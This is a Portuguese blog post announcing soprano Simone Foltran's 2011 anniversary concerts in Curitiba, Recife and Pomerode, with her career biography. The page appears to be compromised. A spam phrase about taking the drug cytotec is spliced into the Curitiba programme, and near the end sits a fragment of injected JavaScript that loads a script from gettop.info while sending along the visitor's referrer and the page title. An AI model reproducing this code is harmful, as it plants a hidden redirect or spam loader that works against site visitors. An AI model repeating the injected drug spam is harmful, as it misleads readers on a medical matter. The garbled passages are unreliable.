Escrito por em 12 out 2011 nas áreas Programação

Simone Foltran está de malas prontas para ir comemorar seus 20 anos de carreira como cantora lírica com vários concertos e Master Classes pelo Brasil:  Curitiba, Recife e Pomerode.

Compromissos já confirmados:

 

CURITIBA

 

Dias 21, 22 e 23 de outubro

Capela Santa Maria
Rua Conselheiro Laurindo, 273, Centro
Curitiba/PR. Fone: (41) 3321 2840

Programa

Harry Crowl
Finismundo

 

Dias 11.11, às 20h. e 12.11, às 18:30h.

Capela Santa Maria

Programa como tomar cytotec 200 pg

Joahnnes Brahms
Ein Deutsches Requiem (Réquiem Alemão) para Soprano, Barítono, Coro e 2 Pianos, Op. 45
– Soprano:  Simone Foltran (Brasil/Alemanha)
– Baixo/barítono:  Leonardo Pace
– Piano Clenice Ortiga e Carmen Célia Fregoneze
– Regente Helma Haller

Simone Foltran vai oferecer este Requiem a Neyde Thomas, o que é uma belíssima lembrança.

O piano Steinway usado neste concerto foi gentilmente cedido pela Pró-Música de Curitiba com objetivo de fomentar a cultura musical da cidade.

 

Dia 16.11, às 12h.

Paço da Liberdade
Praça José Borges de Macedo, 172-300 – Centro
Curitiba – PR, 80020-220, Brasilien
Bus: Estação Central

Programa

O Romantismo alemão e Canções brasileiras
– Simone Foltran – Soprano
– Paulo Emiliano Piá de Andrade – Piano

 

RECIFE

 

Dia 21.11

Conservatório Pernambucano de Música
Av. João de Barros, 594 – Santo Amaro – Recife-PE
Fone: 3183-3400

Abertura da Semana da Música

 

POMERODE

 

Dia 27.11

Teatro Municipal de Pomerode
Rua Quinze de Novembro, 818
Centro, Pomerode / SC
Telefone: (47) 3387 2627
Site: www.pomerode.sc.gov.br

Programa

Obras dos compositores: Fryderyk Chopin(1810-1849), Antonio Vivaldi (1678-1741), Franz Schubert (1797-1828), Saint Säens ( 1835-1921), Pietro Mascagni (1863-1945), Ruggero Leoncavallo e Canções de Natal.
– Gian Pietro Bontempi, piano
– Simone Foltran, soprano
– Cezino Demetrio Beto (tenor)
– Omar (barítono)

Grupo instrumental:
– Gian Pietro Bontempi (piano)
– Gilson Padaratz (violino)
– Roberto Maske (bandoneon)
– Thiago Bezerra (violoncelo)

 

Simone Foltran

Nasceu em Porto Alegre e graduou-se em Licenciatura em Música, Bacharelado em Piano e Bacharelado em Canto na Escola de Música e Belas Artes do Paraná, obtendo a primeira colocação em Canto, na classe da professora Neyde Thomas. Em 1997, foi premiada com bolsa de estudos pela CAPES para continuar seus estudos na Universidade de Artes de

Berlim – Alemanha, com Ingrid Figur, Julie Kaufmann e Axel Bauni (Lied do século XX). Pós-Graduação em Ópera na Hochschule für Musik “Carl Maria von Weber” em Dresden – Alemanha, como bolsista da Fundação VITAE, na classe de Hartmuth Zabel, onde participou das Master Classes do tenor Peter Schreier e do maestro Sir Colin Davis.

Na Alemanha, interpretou o papel-título da ópera “Zaide”, de Mozart, e “Der bekehrte Trunkenbold” de Gluck, sob a regência de Sebastian Krahnert, tendo feito com essas produções em turnês pela Itália. Acompanhada pelo pianista Axel Bauni, foi responsável ainda pela estreia berlinense do ciclo de canções “Las horas de una estancia”, de Alberto Ginastera, onde interpretou também o ciclo “Das Marienleben” de Paul Hindemith na versão original.

Primeiro lugar feminino e Prêmio Mozart no 3° Concurso Brasileiro de Canto Maria Callas em 1997, foi cantora da Camerata Antiqua de Curitiba, tendo gravado solos em três CDs do grupo. Sua carreira fonográfica também inclui um disco do Grupo Novo Horizonte, do maestro Graham Griffiths, como solista em “Finismundo“ de Harry Crowl, bem como em dois CD do grupo AmericAntiga, do regente Ricardo Bernardes.

Tem no currículo óperas, concertos e recitais em várias cidades brasileiras, de Porto Alegre a Manaus, sob a regência de maestros como Gerardo Gorosito, Alceo Bocchino, Christian Höppner, Osvaldo Colarusso, Júlio Medaglia, David Chew, Roberto de Regina e Paulo Torres, interpretando obras como “Rigoletto”, de Verdi; “A Flauta Mágica” e “Cosi fan tutte”, de Mozart; “Fosca”, de Carlos Gomes; “Rusalka”, de Dvorak; “Cantata BWV 147”, de J. S. Bach; “Bachianas Brasileiras n° 5”, de Villa-Lobos; “Sinfonia n°4”, de Mahler; “Sonhos de uma Noite de Verão”, de Mendelssohn; e “Te Deum”, de Bruckner.

No Teatro Guaíra, em Curitiba, suas aparições aconteceram nas óperas “A Flauta Mágica”, “Don Giovanni”, “As Bodas de Fígaro” (Mozart), “Rigoletto” (Verdi), “La Cenerentola” (Rossini) e “Orfeu e Eurídice” (Gluck), e em diversos concertos com a OSINPA. Em São Paulo atuou com a OSESP na montagem da ópera “La Cenerentola” de Rossini, que marcou a reinauguração do Teatro São Pedro, em 98, tendo cantado sob regência de Roberto Minczuk.

Apresentou-se em vários recitais acompanhada pela pianista Vânia Pajares, incluindo o recital de abertura do Festival Aldo Baldin, em Florianópolis. Em outubro de 1999, estreou no Teatro Municipal de São Paulo cantando “Carmina Burana”, de Carl Orff, sob regência de Luiz Fernando Malheiro.

Apresentou-se com a orquestra “Berliner Symphoniker“ em Berlim cantando a ópera “O Cavaleiro da Rosa“ de Richard Strauss, como Marechala. Participou como única cantora latinoamericana do ciclo “Lied Strahl“ de música contemporânea, realizado durante a Exposição Mundial – EXPO 2000 em Hannover, Alemanha.

Como Condessa em “As Bodas de Fígaro” de Mozart participou do IV Festival Amazonas de Ópera no Teatro Amazonas – Manaus (2000), sob regência de Luiz Fernando Malheiro e direção cênica de William Pereira, apresentando-se também no Teatro São Pedro em SP. Atuou como solista junto à “Kammeroper Dresden”, sob direção de Thomas Ender, interpretando os personagens: Gretel em “Hänsel und Gretel” de Humperdinck e Agathe em “Der Freischütz” von Carl Maria von Weber. Como solista convidada, cantou com o “Ensemble Cosmopolitano Berlin” de música contemporânea latino-americana, sob direção de Arturo Pantaléon, realizando a estréia mundial de diversas peças dos compositores Pedro Alejandro Sarmiento, Mariana Villanueva, Arturo Pantaleón e Gabriel Soto (2002-03).

Em 2007, gravou o Requiem de Pa. José Maurício, e a Cantata Ulisséia, além de árias de compositores do período colonial, na Universidade do Texas em Austin (USA), sob a direção de Ricardo Bernardes com o grupo AmericAntiga Early Music. Em 2009, no Teatro Geißler em Lübeck, interpretou Magda em “La Rondine” de Puccini, “Si” de Pietro Mascagni, “La Bohème” e “Pagliacci” de Leoncavallo, “Schneeflöckchen” de Rimsky-Korsakov, “Zigeunerliebe” e “Das Land des Lächelns” de Franz Lehár.

Em 2010, participou do III Festival de Música de Câmara “Oferenda Musical” no Teatro São Pedro (SP), sob direção de Alex Klein interpretando obras de George Crumb, Paul Hindemith e Gilberto Mendes. Divulga a música brasileira no exterior, especialmente Carlos Gomes, Villa-Lobos, Claudio Santoro, Padre José Maurício Nunes Garcia e Alberto Nepomuceno, em diversos concertos e eventos.

 

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Faça seu comentário